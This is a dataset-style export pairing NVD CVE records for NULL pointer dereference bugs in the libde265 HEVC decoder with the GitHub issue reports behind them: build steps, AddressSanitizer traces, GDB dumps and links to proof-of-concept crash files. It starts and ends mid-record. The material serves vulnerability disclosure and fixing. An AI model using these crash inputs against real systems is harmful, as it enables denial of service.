0x00005555557c2324 in mc_chroma<unsigned char> (ctx=0x621000000100, sps=0x629000005210, mv_x=0, mv_y=2, xP=0, yP=0, out=0x7ffffffe6d60, out_stride=16, ref=0x0, ref_stride=0, nPbWC=8, nPbHC=16, bit_depth_C=8) at motion.cc:244
244 padbuf[x+extra_left + (y+extra_top)*(MAX_CU_SIZE+16)] = ref[ xA + yA*ref_stride ];
─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x00005555557c2316 mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6304 and %edi,%edx
0x00005555557c2318 mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6306 test %dl,%dl
0x00005555557c231a mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6308 je 0x5555557c2324 <mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6318>
0x00005555557c231c mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6310 mov %rax,%rdi
0x00005555557c231f mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6313 callq 0x555555570dd0 <__asan_report_load1@plt>
0x00005555557c2324 mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6318 movzbl (%rcx),%ecx
0x00005555557c2327 mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6321 lea -0x1610(%r15),%rdx
0x00005555557c232e mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6328 movslq %esi,%rax
0x00005555557c2331 mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6331 add %rdx,%rax
0x00005555557c2334 mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6334 mov %rax,%rdx
─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
rax 0x0000000000000000 rbx 0x000055555581d4e0 rcx 0x0000000000000000 rdx 0x0000000000000000 rsi 0x0000000000000000 rdi 0x0000000000000000 rbp 0x00007ffffffe29f0 rsp 0x00007ffffffdee60
r8 0x0000000000000000 r9 0x0000000000000000 r10 0x00007ffffffe2a10 r11 0x00007ffffffe6d60 r12 0x00007ffffffe2a10 r13 0x00000fffffffbde0 r14 0x00007ffffffdef00 r15 0x00007ffffffe29c0
rip 0x00005555557c2324 eflags [ PF ZF IF RF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
239 for (int x=-extra_left;x<nPbWC+extra_right;x++) {
240
241 int xA = Clip3(0,wC-1,x + xIntOffsC);
242 int yA = Clip3(0,hC-1,y + yIntOffsC);
243
244 padbuf[x+extra_left + (y+extra_top)*(MAX_CU_SIZE+16)] = ref[ xA + yA*ref_stride ];
245 }
246 }
247
248 src_ptr = &padbuf[extra_left + extra_top*(MAX_CU_SIZE+16)];
─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[0] from 0x00005555557c2324 in mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6318 at motion.cc:244
[1] from 0x000055555579fcb0 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+11224 at motion.cc:412
[2] from 0x00005555557b92dd in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+496 at motion.cc:2141
[3] from 0x0000555555683258 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int)+2790 at slice.cc:4136
[4] from 0x0000555555687afa in read_coding_unit(thread_context*, int, int, int, int)+15196 at slice.cc:4504
[5] from 0x0000555555689d5e in read_coding_quadtree(thread_context*, int, int, int, int)+3873 at slice.cc:4652
[6] from 0x00005555556729f1 in read_coding_tree_unit(thread_context*)+1351 at slice.cc:2861
[7] from 0x000055555568aec2 in decode_substream(thread_context*, bool, bool)+4333 at slice.cc:4741
[8] from 0x000055555568e986 in read_slice_segment_data(thread_context*)+1762 at slice.cc:5054
[9] from 0x000055555558c18a in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*)+3516 at decctx.cc:852
[+]
─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[1] id 14091 name dec265 from 0x00005555557c2324 in mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6318 at motion.cc:244
─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
arg ctx = 0x621000000100: {<error_queue> = {warnings = {[0] = DE265_WARNING_CTB_OUTSIDE_IMAGE_AREA, […, sps = 0x629000005210: {sps_read = true,video_parameter_set_id = 12 '\f',sps_max_sub_layers = 5 '\…, mv_x = 0, mv_y = 2, xP = 0, yP = 0, out = 0x7ffffffe6d60: 0, out_stride = 16, ref = 0x0: Cannot access memory at address 0x0, ref_stride = 0, nPbWC = 8, nPbHC = 16, bit_depth_C = 8
loc xA = 0, yA = 0, x = -1, y = -1, padbuf = '\000' <repeats 5359 times>, src_ptr = 0x0: Cannot access memory at address 0x0, src_stride = 0, extra_left = 1, extra_right = 2, extra_bottom = 2, extra_top = 1, __PRETTY_FUNCTION__ = "void mc_chroma(const base_context*, const seq_parameter_set*, int, int, int, int, int16_t*, int, co…, shift3 = 6, wC = 16, hC = 48, xFracC = 0, yFracC = 2, xIntOffsC = 0, yIntOffsC = 0, mcbuffer = {[0] = 0 <repeats 4544 times>}
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>>> p ref
$1 = (const unsigned char *) 0x0
>>>
```
# Impact
This vulnerability is capable of crashing software, causing a denial of service via a crafted input file.
| NULL Pointer Dereference in function mc_chroma at motion.cc:244 | https://api.github.com/repos/strukturag/libde265/issues/379/comments | 2 | 2023-01-28T03:15:32Z | 2023-03-04T07:38:40Z | https://github.com/strukturag/libde265/issues/379 | 1,560,664,401 | 379 |
CVE-2023-24752 | 2023-03-01T15:15:11.447 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_hevc_epel_pixels_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/378"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/strukturag/libde265/issues/378 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function ff_hevc_put_hevc_epel_pixels_8_sse at sse-motion.cc:987
# Version
```
git log
commit 1cf2999583ef8a90e11933ed70908e4e2c2d8872 (HEAD -> master, origin/master, origin/HEAD)
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_segv02.bin
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
AddressSanitizer:DEADLYSIGNAL
=================================================================
==7777==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x561cd0288664 bp 0x000000000008 sp 0x7ffc7e060af0 T0)
==7777==The signal is caused by a READ memory access.
==7777==Hint: address points to the zero page.
#0 0x561cd0288663 in _mm_loadl_epi64(long long __vector(2) const*) /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:709
#1 0x561cd0288663 in ff_hevc_put_hevc_epel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, int, int, short*) /home/fuzz/libde265/libde265/x86/sse-motion.cc:987
#2 0x561cd032c6ab in acceleration_functions::put_hevc_epel(short*, long, void const*, long, int, int, int, int, short*, int) const ../libde265/acceleration.h:296
#3 0x561cd032c6ab in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:205
#4 0x561cd0323067 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:412
#5 0x561cd0323edd in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2141
#6 0x561cd020f601 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4314
#7 0x561cd02182e1 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#8 0x561cd02188b6 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4638
#9 0x561cd021a3db in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#10 0x561cd021d0c2 in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#11 0x561cd0126487 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#12 0x561cd0129ca0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#13 0x561cd012a934 in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#14 0x561cd012e1c7 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:697
#15 0x561cd012f62c in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#16 0x561cd0130df5 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#17 0x561cd00f5f9d in main /home/fuzz/libde265/dec265/dec265.cc:764
#18 0x7f8428229082 in __libc_start_main ../csu/libc-start.c:308
#19 0x561cd00fa0dd in _start (/home/fuzz/libde265/dec265/dec265+0x240dd)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:709 in _mm_loadl_epi64(long long __vector(2) const*)
==7777==ABORTING
```
# POC
[poc_segv02.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_segv02.bin)
# GDB
```
gdb --args ./dec265 ./poc_segv02.bin
─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
Program received signal SIGSEGV, Segmentation fault.
_mm_loadl_epi64(long long __vector(2) const*) (__P=<optimized out>) at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:709
709 return _mm_set_epi64 ((__m64)0LL, *(__m64_u *)__P);
─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x0000555555706650 _mm_loadl_epi64(long long __vector(2) const*)+84 setle %r10b
0x0000555555706654 _mm_loadl_epi64(long long __vector(2) const*)+88 test %dil,%dil
0x0000555555706657 _mm_loadl_epi64(long long __vector(2) const*)+91 setne %r11b
0x000055555570665b _mm_loadl_epi64(long long __vector(2) const*)+95 test %r11b,%r10b
0x000055555570665e _mm_loadl_epi64(long long __vector(2) const*)+98 jne 0x55555570713a <ff_hevc_put_hevc_epel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, int, int, short*)+4010>
0x0000555555706664 _mm_loadl_epi64(long long __vector(2) const*)+104 movq 0x0(%rbp),%xmm7
0x0000555555706669 _mm_loadl_epi64(long long __vector(2) const*)+109 mov %r12,%r9
0x000055555570666c _mm_loadl_epi64(long long __vector(2) const*)+112 shr $0x3,%r9
0x0000555555706670 _mm_loadl_epi64(long long __vector(2) const*)+116 cmpw $0x0,0x7fff8000(%r9)
0x0000555555706679 _mm_loadl_epi64(long long __vector(2) const*)+125 punpcklbw %xmm6,%xmm7
─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
rax 0x0000000000000001 rbx 0x0000000000000000 rcx 0xffffffffffffffe0 rdx 0x00005555557f0fc0 rsi 0x0000000000000000 rdi 0x0000000000000000 rbp 0x0000000000000008 rsp 0x00007ffffffde7f0
r8 0x0000000000000008 r9 0x0000000000000001 r10 0x0000000000000001 r11 0x0000000000000000 r12 0x00007ffffffe66a0 r13 0x0000000000000000 r14 0x0000000000000008 r15 0x00000aaaaaafe2a1
rip 0x0000555555706664 eflags [ PF ZF IF RF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
704 }
705
706 extern __inline __m128i __attribute__((__gnu_inline__, __always_inline__, __artificial__))
707 _mm_loadl_epi64 (__m128i_u const *__P)
708 {
709 return _mm_set_epi64 ((__m64)0LL, *(__m64_u *)__P);
710 }
711
712 extern __inline __m128i __attribute__((__gnu_inline__, __always_inline__, __artificial__))
713 _mm_loadu_si64 (void const *__P)
─── Stack ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────���────────────────────────────────────────────────────────────────────
[0] from 0x0000555555706664 in _mm_loadl_epi64(long long __vector(2) const*)+104 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:709
[1] from 0x0000555555706664 in ff_hevc_put_hevc_epel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, int, int, short*)+1236 at sse-motion.cc:987
[2] from 0x00005555557aa6ac in acceleration_functions::put_hevc_epel(short*, long, void const*, long, int, int, int, int, short*, int) const+182 at ../libde265/acceleration.h:296
[3] from 0x00005555557aa6ac in mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+7260 at motion.cc:205
[4] from 0x00005555557a1068 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+26328 at ../libde265/image.h:301
[5] from 0x00005555557a1ede in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+446 at motion.cc:2141
[6] from 0x000055555568d602 in read_coding_unit(thread_context*, int, int, int, int)+8402 at slice.cc:4314
[7] from 0x00005555556962e2 in read_coding_quadtree(thread_context*, int, int, int, int)+2834 at slice.cc:4652
[8] from 0x00005555556968b7 in read_coding_quadtree(thread_context*, int, int, int, int)+4327 at slice.cc:4638
[9] from 0x0000555555697b83 in read_coding_tree_unit(thread_context*)+1587 at slice.cc:2861
[+]
─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[1] id 7781 name dec265 from 0x0000555555706664 in _mm_loadl_epi64(long long __vector(2) const*)+104 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:709
─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
arg __P = <optimized out>
loc x = 0, y = 0, x1 = <optimized out>, x2 = <optimized out>, src = 0x8 <error: Cannot access memory at address 0x8>: Cannot access memory at address 0x8…
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>>>
```
# Impact
This vulnerability is capable of crashing software, causing a denial of service via a crafted input file. | NULL Pointer Dereference in function ff_hevc_put_hevc_epel_pixels_8_sse at sse-motion.cc:987 | https://api.github.com/repos/strukturag/libde265/issues/378/comments | 2 | 2023-01-28T02:54:24Z | 2023-03-04T07:39:03Z | https://github.com/strukturag/libde265/issues/378 | 1,560,655,877 | 378 |
CVE-2023-24754 | 2023-03-01T15:15:11.510 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_weighted_pred_avg_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/382"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/strukturag/libde265/issues/382 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function ff_hevc_put_weighted_pred_avg_8_sse at sse-motion.cc:237
# Version
```
git log
commit 7ea8e3cbb010bc02fa38419e87ed2281d7933850 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <[email protected]>
Date: Sat Jan 28 15:03:34 2023 +0100
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_segv05.bin
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3328352==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555570c29d bp 0x7ffffffe28c0 sp 0x7ffffffe24d0 T0)
==3328352==The signal is caused by a WRITE memory access.
==3328352==Hint: address points to the zero page.
#0 0x55555570c29c in _mm_storeu_si128(long long __vector(2)*, long long __vector(2)) /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
#1 0x55555570c29c in ff_hevc_put_weighted_pred_avg_8_sse(unsigned char*, long, short const*, short const*, long, int, int) /home/fuzz/libde265/libde265/x86/sse-motion.cc:237
#2 0x5555557b9c19 in acceleration_functions::put_weighted_pred_avg(void*, long, short const*, short const*, long, int, int, int) const ../libde265/acceleration.h:249
#3 0x5555557a1a6a in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:544
#4 0x5555557b973e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2155
#5 0x555555683316 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4136
#6 0x5555556878c1 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4497
#7 0x555555689e17 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#8 0x555555672a97 in read_coding_tree_unit(thread_context*) /home/fuzz/libde265/libde265/slice.cc:2861
#9 0x55555568af7b in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#10 0x55555568ea3f in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#11 0x55555558c205 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#12 0x55555558d6c0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#13 0x55555558a7dc in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#14 0x555555589efc in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:697
#15 0x55555559070e in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#16 0x555555592354 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#17 0x55555557cffa in de265_decode /home/fuzz/libde265/libde265/de265.cc:362
#18 0x555555577b2f in main /home/fuzz/libde265/dec265/dec265.cc:764
#19 0x7ffff7046082 in __libc_start_main ../csu/libc-start.c:308
#20 0x5555555712ed in _start (/home/fuzz/libde265/dec265/dec265+0x1d2ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727 in _mm_storeu_si128(long long __vector(2)*, long long __vector(2))
==3328352==ABORTING
```
# POC
[poc_segv05.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_segv05.bin)
# GDB
```
gdb --args ./dec265 ./poc_segv05.bin
─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
Program received signal SIGSEGV, Segmentation fault.
0x000055555570c29d in _mm_storeu_si128(long long __vector(2)*, long long __vector(2)) (__B=..., __P=0x0) at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
727 *__P = __B;
─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x000055555570c281 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+101 mov $0x10,%esi
0x000055555570c286 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+106 mov %rdx,%rdi
0x000055555570c289 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+109 callq 0x555555571040 <__asan_report_store_n@plt>
0x000055555570c28e _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+114 movdqa -0x250(%rbp),%xmm0
0x000055555570c296 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+122 mov -0x380(%rbp),%rdx
0x000055555570c29d _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+129 movups %xmm0,(%rdx)
0x000055555570c2a0 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+132 nop
~
~
~
─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
rax 0x000055555581d520 rbx 0x00007ffffffeed20 rcx 0x0000000000000000 rdx 0x0000000000000000 rsi 0x0000000000000007 rdi 0x0000000000000000 rbp 0x00007ffffffe2870 rsp 0x00007ffffffe2480
r8 0x0000000000000000 r9 0x0000000000000040 r10 0x0000000000000040 r11 0x0000000000000040 r12 0x000055555581d520 r13 0x0000000000000010 r14 0x00000fffffffc54c r15 0x00007ffffffe2a60
